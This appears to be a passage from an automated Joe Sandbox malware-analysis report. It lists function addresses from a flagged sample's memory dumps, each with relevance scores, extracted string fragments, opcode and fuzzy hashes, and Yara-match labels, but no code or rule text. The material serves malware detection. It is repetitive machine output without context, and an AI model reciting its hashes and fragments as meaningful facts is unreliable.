                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                        • API String ID: 0-3469842109
                                                                                                                                                                                                                                        • Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                                                                                                                                                                                        • Instruction ID: 7a5b6c10130ed03228e70c9137c4cc799e0441b6c82f80d5f6934c3938f2d65e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD02EF746483848FD714CF29C8D076ABBE1EB86300F05866DEA858B3D1D3B5E909CB96
                                                                                                                                                                                                                                        Function 004042B0 Relevance: 6.7, Strings: 5, Instructions: 464COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                        • API String ID: 0-3469842109
                                                                                                                                                                                                                                        • Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                                                                                                                                                                                        • Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96
                                                                                                                                                                                                                                        Function 02109507 Relevance: 6.7, Strings: 5, Instructions: 452COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                                                                                                                                                                                        • API String ID: 0-2182630447
                                                                                                                                                                                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction ID: eda063c13f1c6caf035864c639b323fe84ecce3b211f5368ba204640dddc52fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FC1377165C3914FD3248F29C4A176BBFE2AFD3604F18896DE4D04B382D3B9840ACB92
                                                                                                                                                                                                                                        Function 004092A0 Relevance: 6.7, Strings: 5, Instructions: 452COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                                                                                                                                                                                        • API String ID: 0-2182630447
                                                                                                                                                                                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796
                                                                                                                                                                                                                                        Function 021099F7 Relevance: 6.7, Strings: 5, Instructions: 415COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *+$43A2C7AD89C30672D0632DF0E28DC412$kh$nz${u
                                                                                                                                                                                                                                        • API String ID: 0-3798273896
                                                                                                                                                                                                                                        • Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                                                                                                                                                                                        • Instruction ID: 57744ad7df7e4b48e013c9f71c060b57ff8964db1d14cb9ffb12cf363a020809
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42D1F3716483508BD724DF38C8A1BABBBE2EFC1318F18896DE4D58B292D774D409CB46
                                                                                                                                                                                                                                        Function 0212A305 Relevance: 6.7, Strings: 5, Instructions: 407COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,fbV$d~`}$lvhu$ooKv$sf
                                                                                                                                                                                                                                        • API String ID: 0-4157365443
                                                                                                                                                                                                                                        • Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                                                                                                                                                                                        • Instruction ID: efaaf5cd089f9032885ab5b383d31d15d6f7bb2bf880f3f85bf3c305d517cc11
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D107B15483919FD724CF14C8917ABB7E2AFC5304F08892CE5D68B341E779EA09CB86
                                                                                                                                                                                                                                        Function 0212FF23 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BVAI$_Pna$mc$t
                                                                                                                                                                                                                                        • API String ID: 0-1770441902
                                                                                                                                                                                                                                        • Opcode ID: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
                                                                                                                                                                                                                                        • Instruction ID: c222ed13b36e13a5ea78688ad2f0225c47a922bf8a230a4f50108c222e02a4bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CA1B47054C3C18AE739CF2584107BBBBE2AFDB304F18896DD0D997682D779814ACB56
                                                                                                                                                                                                                                        Function 0042FCBC Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BVAI$_Pna$mc$t
                                                                                                                                                                                                                                        • API String ID: 0-1770441902
                                                                                                                                                                                                                                        • Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
                                                                                                                                                                                                                                        • Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A
                                                                                                                                                                                                                                        Function 0212ECC9 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-1320392364
                                                                                                                                                                                                                                        • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                        • Instruction ID: 40eb1d4d35971d9f60b5d00dfc8913f5d5e26bdfb134a76f818aa931e932fd3d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A791F86124C3918BD718CF39846137AFBE29FD6218F29896DF4D58B291D339C50AC716
                                                                                                                                                                                                                                        Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-1320392364
                                                                                                                                                                                                                                        • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                        • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                                                                                                                                                        Function 0042A9F7 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: v$v$bt$zi
                                                                                                                                                                                                                                        • API String ID: 0-1945541540
                                                                                                                                                                                                                                        • Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
                                                                                                                                                                                                                                        • Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86
                                                                                                                                                                                                                                        Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                        • API String ID: 0-3770969982
                                                                                                                                                                                                                                        • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                        • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                                                                                                                                                        Function 0211BE2C Relevance: 5.2, Strings: 4, Instructions: 223COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                        • API String ID: 0-3770969982
                                                                                                                                                                                                                                        • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                        • Instruction ID: ae41a8695f5a39636fa6a68c7fb5efa5c8bdd939795bcfb3308c1a97ca196a4b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B71C0B558D3958BD304DF12C8802AFBBE2FBD1314F188E6CE5D85B251D739854A8F86
                                                                                                                                                                                                                                        Function 021273B2 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: FOOE$KGFU$KGFU$UUQg
                                                                                                                                                                                                                                        • API String ID: 0-60738199
                                                                                                                                                                                                                                        • Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
                                                                                                                                                                                                                                        • Instruction ID: 62bc8477b215829dc04ceb4204e333c28d2a1deaa6eb44a938cf6ff6ba360235
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D51B1B29C16738FD714CB68C8405ABFBA2EF55310B1E4665D8658B3C1D334E91BC791
                                                                                                                                                                                                                                        Function 02125D57 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: B:$C@$K3$bX_^
                                                                                                                                                                                                                                        • API String ID: 0-595269213
                                                                                                                                                                                                                                        • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                        • Instruction ID: 3a7d082670df0f1c546c1b73264e0000b1e3510e65ff35c29e3624a7f964fb88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D41CEB5D112289FDB20DF79CD827DDBFB1AB85300F4442AAE448A7295D7340E898FD2
                                                                                                                                                                                                                                        Function 021220D7 Relevance: 4.2, Strings: 3, Instructions: 435COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (ijkdefgau`c$au`c$defgau`c
                                                                                                                                                                                                                                        • API String ID: 0-3415814675
                                                                                                                                                                                                                                        • Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                                                                                                                                                                                        • Instruction ID: 01b61d90eb2c4c37dea6c360f939e8462e4f1f4c47fce89660c5c00d59f8af24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79D1AEB16483908FD714DF28C891AABBBE5EFC5318F14892CF9858B391E775D809CB52
                                                                                                                                                                                                                                        Function 02134F56 Relevance: 4.2, Strings: 3, Instructions: 429COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$.$K
                                                                                                                                                                                                                                        • API String ID: 0-4278605028
                                                                                                                                                                                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction ID: f2fe18d41bc0f64dad6973a761127bb2c20b85318e04bf33eef07a0f9c547c75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9029D71614BC08BE3198F3DC891352BFE2AB56304F0CC9ADD4DACB78AC279E5458B65
                                                                                                                                                                                                                                        Function 00434CEF Relevance: 4.2, Strings: 3, Instructions: 429COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$.$K
                                                                                                                                                                                                                                        • API String ID: 0-4278605028
                                                                                                                                                                                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65
                                                                                                                                                                                                                                        Function 0212EE1A Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction ID: 482a90b53e3be27ff54803163605d3915a64a5763dfc8d0d66df8d09247d87cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D81EA6024C3918BD719CF39856137AFBE29FD6218F2C896DF4D58B281D379C50ACB16
                                                                                                                                                                                                                                        Function 0212EDC6 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction ID: f131fe9443a432f4b8b213cbfd6ec4ed684797140b3a19f970cf386be340d58e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA81DA6124C3918BD719CF3984A137AFBE29FD6218F2C896DF4D58B281D379C50AC716
                                                                                                                                                                                                                                        Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                                        Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
